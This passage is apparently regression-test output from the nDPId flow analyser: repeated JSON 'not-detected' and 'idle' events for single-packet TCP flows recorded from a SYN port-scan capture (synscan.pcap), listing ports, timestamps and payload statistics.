{"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":625,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":625,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":631,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":631,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6779,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":636,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6779,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":636,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":62078,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":62078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":62078,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":62078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6788,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6788,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6789,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6789,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6788,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6788,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6789,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6789,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6792,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6792,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6792,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2701,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 